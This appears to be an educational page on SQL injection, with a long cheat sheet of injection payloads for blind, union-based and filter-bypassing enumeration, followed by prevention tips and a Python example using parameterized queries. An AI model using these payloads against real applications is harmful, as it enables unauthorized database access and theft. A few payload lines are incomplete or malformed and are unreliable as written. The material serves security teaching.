What is SQL injection:
SQL injection is a type of cyber attack in which an attacker exploits vulnerabilities in a web application's software to inject malicious code into the database. This can allow the attacker to gain unauthorized access to sensitive information or even take control of the entire database. There are several types of SQL injection attacks, including in-band, out-of-band, and blind attacks, each with its own methods of exploiting web application vulnerabilities. SQL injection attacks can be prevented by using secure coding practices and by regularly testing web applications for vulnerabilities.
What type of SQLi:
- In-band
  - Error-based injections
  - Union-based injections
- Out-of-band injections
- Inferential or Blind
  - Boolean-based attack
  - Time-based attack
Error-based: get information about the database and its structure from its error messages. In other words, the attacker benefits from the error messages leaked by the database.
Example: just type a " into any input field; the error message is going to reveal and leak some of the database information.
Union-based: combine the results of a normal query with those of our attack query to extract additional data.
Out-of-band: exfiltrate data using a different channel than the one the request was made on. It can use HTTP or DNS.
Inferential or Blind: this attack relies on changes in the database's behavior in order to reconstruct information. This method is used when the data is not sent back to the attacker. Most of the time it takes a while to trigger, usually by using a time delay and a true/false condition.
a. Boolean-based attack:
Using the URL with a command like this:
https://url.com/v1/products/346'%20or%201=1;
to be something like this:
b. Time-based attack:
Specify an amount of time to wait when the query is true; otherwise the result is returned without a delay. This gives the attacker a chance to figure out whether something is true or not.
In this attack the attacker needs to know the database server in order to perform it. The previous attack works on Oracle but will not work with others. On MySQL you can use SLEEP() or BENCHMARK().
OWASP ZAP (Zed Attack Proxy) tool for SQLi
ZAP is a man-in-the-middle proxy that intercepts messages sent between the browser and a web application. It is helpful for pen testing because it allows us to inspect and modify the content of a message and then forward the packet to its destination.
If the application has security mechanisms on the front end, we can bypass them and communicate directly with the backend.
An alternative tool to ZAP is Burp Suite.
Every database has a table where it stores its metadata. Look at the picture below to get an idea of what these tables are called in different database servers.
You can query that in PostgreSQL simply with this command:
SELECT * FROM information_schema.tables;
On Oracle it is even simpler:
SELECT table_name FROM dba_tables;
SQL-Injection-cheat-sheet
- First try to figure out the vulnerable parameter
NOTE: If it's a GET request, don't forget to URL-encode the characters.
param=' --> try to get error
param=" --> try to get error
param=' or 1=1 --> try if it works
param=' or 1=0 --> check if it returns nothing
param=' and 1=1 --> check if this works or produces error
Try the blind injection payloads if the commands above do not produce an error
' or sleep(2) and 1=1# --> try to get a delay; sleep() only runs when the other conditions are true and the database actually has to evaluate it
' or sleep(2)# --> try to get a delay
admin' and sleep(2)# --> will delay only if the user admin exists
' union select sleep(2),null# --> check if it produces delay
' union select sleep(2),null,null,null,null# --> check if it produces delay, check for different number of columns
Check whether the queries above work by appending a comment at the end
param=' or 1=1# --> try if it works
param=' or 1=1 -- one space needed --> try if it works
param=' or 1=1 // --> try if it works
param= or 1=1# --> try if it works
param=and or 1=1# --> try if it works
param=' or 1=1-- sd --> try if it works
' AND (select 1)=1 <-- This should be TRUE Response -- subselect supported
- Now that we know the vulnerable parameter, let's try guessing the table name:
' AND (select 1 from admin limit 0,1)=1 <-- FALSE
' AND (select 1 from users limit 0,1)=1 <-- TRUE ======> Table found 'users'
- Guessing Columns:
' AND (select substring(concat(1,pass),1,1) from users limit 0,1)=1 <-- FALSE
' AND (select substring(concat(1,password),1,1) from users limit 0,1)=1 <-- TRUE =====> Column 'password' found.
- Now determine the number of columns in the current table
param=' or 1=1 order by 1#
param=' or 1=1 order by 10#
Let's say there are 3 columns
- Now determine the vulnerable columns, i.e. the columns that are visible in the page
param=' or 1=0 union select null,null,null# --> if it produces no error then try
param=' or 1=0 union select 1,2,3# --> check which number shows in web page
Else try
param=' or 1=1 union select table_name,null,null from information_schema.tables#
if it produces an error, try table_name at other positions
Now, let's say columns 1 and 2 are shown in the web page
- To further enumerate
param=' or 1=0 union select table_schema,null,null from information_schema.columns# --> display all database names
Note the 1=0 in the query above: it is there so that only the database names are shown
param=' or 1=0 union select version(),null,null from information_schema.columns# --> retrieve the version
param=' or 1=0 union select @@version,null,null from information_schema.columns# --> retrieve the version in MSSQL
param=' or 1=0 union select substring(version(),1,1)=1,null,null from information_schema.columns# --> returns true if the version is 1.x.x
param=' or 1=0 union select substring(version(),1,1)=5,null,null from information_schema.columns# --> returns true if the version is 5.x.x
param=' or 1=0 union select substring(version(),3,1)=2,null,null from information_schema.columns# --> returns true if the version is 5.2.x
param=' or 1=0 union select table_name,null,null from information_schema.columns# --> display all table names
param=' or 1=1 select table_name,null,null from information_schema.columns where table_schema='public'# --> display the tables inside the public database
param=' or 1=1 select column_name,null,null from information_schema.columns where table_schema='public' and table_name='info'# --> display all columns of the info table
param=' or 1=1 select table_name as table,column_name as column,null from information_schema.columns#
Let's say the database name is public and the table name is info, with two columns in it, id and name.
param=' or 1=0 union select id,null,null from public.info# --> display id column from table "info"
param=' or 1=0 union select id,name,null from public.info# --> display id and name column from table "info"
param=' or 1=0 union select id,name,null from public.info where id='papa'# --> display id and name of 'papa'
- BYPASSING filters
We can use case switching or commenting to bypass basic filters.
param=' or 1=0 UniOn selEct id,null,null FroM public.info#
param=' or 1=0 un/**/ion sele/**/ct id,null,null fr/**/om public.info# --> works in MSSQL
- For Oracle DB
Oracle does not have an information schema, so we need some alternatives for it. The link below can be helpful.
https://stackoverflow.com/questions/8739203/oracle-query-to-fetch-column-names
- For advanced exploitation, we may use sqlmap
Some tips to prevent SQL injection attacks include:
- Use prepared statements or parameterized queries instead of dynamically building SQL statements with user input.
- Use stored procedures instead of dynamically building SQL statements with user input.
- Use input validation to ensure that user input conforms to expected formats and ranges.
- Use proper error handling to prevent sensitive information from being leaked in error messages.
- Use least privilege access controls to limit the permissions of database users and applications.
- Keep database software up to date with the latest security patches and updates.
- Conduct regular security testing, including vulnerability scans and penetration testing, to identify and address any vulnerabilities.
It's important to note that preventing SQL injection attacks requires a multi-layered approach, and no single technique or tool can completely eliminate the risk of an attack.
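To make the first, third and fourth tips concrete, here is an added Python example (not from the original page) using the standard sqlite3 module with a constructed in-memory users table. It contrasts a query built by string formatting with a parameterized one using the same `' or 1=1` input the cheat sheet above tests with, puts an allowlist check on the username in front of the query, and returns a generic error instead of the database's own message. The table layout, sample rows and the accepted username format are assumptions made for the illustration.

```python
import re
import sqlite3


def make_db():
    """Constructed in-memory database with a small users table (sample data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO users (username, password) VALUES (?, ?)",
        [("alice", "hash1"), ("bob", "hash2"), ("admin", "hash3")],
    )
    conn.commit()
    return conn


def lookup_vulnerable(conn, username):
    """Dynamically builds the statement from user input: the injection sink."""
    sql = f"SELECT username FROM users WHERE username = '{username}'"
    return [row[0] for row in conn.execute(sql)]


def lookup_parameterized(conn, username):
    """Placeholder binding: the value is passed separately and never parsed as SQL."""
    sql = "SELECT username FROM users WHERE username = ?"
    return [row[0] for row in conn.execute(sql, (username,))]


# Assumed username format for the allowlist: 1-32 letters, digits or underscores.
USERNAME_RE = re.compile(r"[A-Za-z0-9_]{1,32}")


def lookup_validated(conn, username):
    """Input validation in front of the parameterized query."""
    if not USERNAME_RE.fullmatch(username):
        raise ValueError("invalid username format")
    return lookup_parameterized(conn, username)


def safe_lookup_response(conn, username):
    """Error handling: never echo the database's error text back to the client."""
    try:
        return {"ok": True, "users": lookup_validated(conn, username)}
    except ValueError:
        return {"ok": False, "error": "invalid input"}
    except sqlite3.Error:
        return {"ok": False, "error": "internal error"}


if __name__ == "__main__":
    conn = make_db()
    payload = "' or 1=1 -- "
    print("vulnerable   :", lookup_vulnerable(conn, payload))      # every user
    print("parameterized:", lookup_parameterized(conn, payload))   # []
    try:
        lookup_vulnerable(conn, "'")   # the lone quote from the cheat sheet
    except sqlite3.Error as exc:
        print("leaked error :", exc)   # the text error-based injection feeds on
    print("hardened     :", safe_lookup_response(conn, "'"))
```

The parameterized version alone is enough to stop the injection; the allowlist and the generic error response are defense in depth, so that a malformed value is rejected before it reaches the database and a genuine database error does not leak the information the error-based technique relies on.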
Some useful cheat sheets for SQLi
https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/
https://sqlzoo.net/wiki/SQL_Tutorial
https://portswigger.net/web-security/sql-injection/blind
https://portswigger.net/web-security/sql-injection/examining-the-database